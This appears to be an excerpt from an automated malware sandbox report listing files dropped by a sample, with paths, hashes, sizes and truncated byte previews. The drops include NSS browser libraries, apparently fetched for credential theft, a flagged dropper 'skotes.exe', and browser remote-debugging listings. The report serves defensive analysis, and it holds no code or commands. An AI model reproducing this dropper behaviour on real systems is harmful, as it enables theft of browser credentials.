SHA-512:	03156D99EF5CE4C9519F77174C4DC734E0B5C5B7D2660DAA93CF1D108341C71868A4014F778D80103999668F0789E10F821A08F8FE05F5B6F3332A4A3B012212
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.g.o.n.v.T.9.c.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4./.d.f.o.L.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.394272340573441
Encrypted:	false
SSDEEP:	96:6NnQDODJHQDOONnQUbQ7NnQk9QmNnQnJdgEQnDNnQDIQDwNnQcDQSNnQkwQRNnQO:6NCOD4OON2NHNAuNHNBhNjtN1PAq
MD5:	A45266FD332744AC748CFDD57D665792
SHA1:	89A13F552D952A1A5AEA152FBDA36D91EB95FCD8
SHA-256:	0BA02270B9F293BDC925D1A12B84C6B5B6B0E8B657568595B4287593F3F85735
SHA-512:	172E257432167CCDDD496BECA3787F0B3C420B5066FCE40E53F613F830A4DF126CBDC362B2F75C804A4AAE47641A7FBAE347F8D9F00C5D6E1116A0E5DCA32F76
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/8401EF91614D1D2C0738E33AE4DB9CBF",.. "id": "8401EF91614D1D2C0738E33AE4DB9CBF",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/8401EF91614D1D2C0738E33AE4DB9CBF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/12FBC7403CA971CB62CCDCE2D387EA5E",.. "id": "12FBC7403CA971CB62CCDCE2D387EA5E",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/12FBC7403CA971CB62CCDCE2D387EA5E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.36879959167606
Encrypted:	false
SSDEEP:	48:SfNaoQqSTEQUfNaoQTWFQUfNaoQVQNfNaoQKUHUlG0UrU0U8QKUI:6NnQVTEQANnQTWFQANnQVQ5NnQ70UrU8
MD5:	FF130AA386793698E9914F6D382AFD27
SHA1:	368D6A146C85FBB1DB19B80AAFACBAB1B4C422E7
SHA-256:	B8B98BD249E497ADC85A432318AF65D26C44B156022AA84647C0A6036E6640B0
SHA-512:	6072B9FB66E38F06A199E90A7A60B422E24A44D9833D022BCD241412481919494381787D97F17B254284D4DD432651605635CAAE0F16028A3E8CF5FC3C8249A9
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/B37F3829512EDA61A28E4016C12EC05D",.. "id": "B37F3829512EDA61A28E4016C12EC05D",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/B37F3829512EDA61A28E4016C12EC05D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/5031130658A17B4C86BEC82B3202418C",.. "id": "5031130658A17B4C86BEC82B3202418C",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/5031130658A17B4C86BEC82B3202418C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2277376
Entropy (8bit):	7.988153661953308
Encrypted:	false
SSDEEP:	49152:psAdnOW6EWoKkbLTVlr3HEHfIePuQcaby0WpldmYAuI9:pjb1pKkbLTVlTHEQIv20WplE/p
MD5:	32EF5CEE9C32A1A7BEA6F851283F7EA0
SHA1:	92D0E19A4BACED49E17329D845AAD944041A9C0A
SHA-256:	2552ED4A0677A3E1111FD6BFD59910BAD8BF9359189179F53F989965BBF2AC8D
SHA-512:	2D280A8153C1C0478A04C20F796487DD7232C0463B6C3EAF9CEDD3D0F4FECC2652260495EC73C96B1219411B8F702E3D5CCC04719BAA11B94D2D39EEC4792C13
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2...p........J...@..................................C...@... ............................._.q.s............................]..............................h]...................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..8...q.......'.............@...lklnedip..............'.............@...cepbmidj.....`.......:C.............@....taggant.0...p..."...@C.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008361001\bca166439f.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2277376
Entropy (8bit):	7.988153661953308
Encrypted:	false
SSDEEP:	49152:psAdnOW6EWoKkbLTVlr3HEHfIePuQcaby0WpldmYAuI9:pjb1pKkbLTVlTHEQIv20WplE/p
MD5:	32EF5CEE9C32A1A7BEA6F851283F7EA0
SHA1:	92D0E19A4BACED49E17329D845AAD944041A9C0A
SHA-256:	2552ED4A0677A3E1111FD6BFD59910BAD8BF9359189179F53F989965BBF2AC8D
SHA-512:	2D280A8153C1C0478A04C20F796487DD7232C0463B6C3EAF9CEDD3D0F4FECC2652260495EC73C96B1219411B8F702E3D5CCC04719BAA11B94D2D39EEC4792C13
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2...p........J...@..................................C...@... ............................._.q.s............................]..............................h]...................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..8...q.......'.............@...lklnedip..............'.............@...cepbmidj.....`.......:C.............@....taggant.0...p..."...@C.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\33921545-bb36-4483-94f4-978f8ef8587a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\4339b3b8-d721-4e37-972f-33aa0b6dc324.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\4a0b35ed-17e4-4949-8616-fa3d05704951.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\4cea1464-95e7-4a14-a729-8667e3e03640.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsJDAFHCGIJE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1931776
Entropy (8bit):	7.951371138114382
Encrypted:	false
SSDEEP:	49152:3vkiCocWLaGUvpxuMjv1jVep2uqJAQNgLPRBfxBp8:3MiFGpjjv1xPzyRY
MD5:	7E87644426BB54D86265DD3C83727973
SHA1:	5D7148BDFA59CDC79275E087AA0FC6A7659C2029
SHA-256:	BBA49D9C5A233F7916671750711049BE4108A7FFAE09E955BC9E90C03D2C4AB1
SHA-512:	1E29CACA935AF25E29C9C5F5E927F97E1BE70792300F2D5A8720E29E8DE1647EE24BA4462AE13FD186D064FEB83A64380A96ED202363A545C89A13DAB9A08A9B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L.....Z.....@.................................W...k.......H....................kL..............................kL..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`+.........................@...sxkyywio.`....2..\..................@...kanpqnsy.....pL......T..............@....taggant.0....L.."...X..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b6a09b47-8aae-4b4e-8381-225f2038a228.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1509832
Entropy (8bit):	7.991711602898579
Encrypted:	true
SSDEEP:	24576:cM8dgfD5V/hQY3go5JVFy9+jRpdcbNoTMVuFNfIdX3dr4A8NIpG7HUtHSs9IIA0o:cgD5V/uYXfVFyORPINoTMiNf8ndra2G/
MD5:	051CFB2CD9AE6110D93F689801BDA5E7
SHA1:	C0C835F459214B75EBABE03E9813B397891A453F
SHA-256:	AF39FD0929F055BC1ABF265DCBE532346648424BD6AF267F9072C6CAC5F24F70
SHA-512:	E58438E130E4ADD5863D54120EC3E64C7ECF604EAEB53F33C1443AF2A40598EA14BF12F0B1E05CC54BE64A46F1237FD61A13F5E5C8F17A0DB6A99FAD6CBFA2D3
Malicious:	false
Preview:	.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM..............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX..D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.....(.$....4E:.L.

C:\Users\user\AppData\Local\Temp\c56b4337-571d-49c4-b546-bba358c1ee0f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
Category:	dropped
Size (bytes):	76314
Entropy (8bit):	7.996159328201069
Encrypted:	true
SSDEEP:	1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
MD5:	703D592C85D2790D89047C1614A54B4F
SHA1:	0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
SHA-256:	A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
SHA-512:	D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
Malicious:	false
Preview:	...........}io.8..w... @..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..\|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r\|\|z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....\|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#\|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	5.407611647096411
Encrypted:	false
SSDEEP:	48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx08Fp5Xg208M5M:JIVuwEw5MUFZLBQLttOM
MD5:	33226EAA07E44388721E3DC6170FCE5C
SHA1:	4C1FDDCA63CB3F977340A59E4B16E5F334532CF2
SHA-256:	DACEDC03877E9723F1C9E988336F07A88A2A5EDC9B6D6A39494357683571413C
SHA-512:	17E4052AB7C909384696097FF13BB5727149AF55F38D51DBC19D93AFD9573FD23B1D7628F0562EAB95729A15D28E3269C32B06868C25CBAB70FD50327ED43D5B
Malicious:	false
Preview:	{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

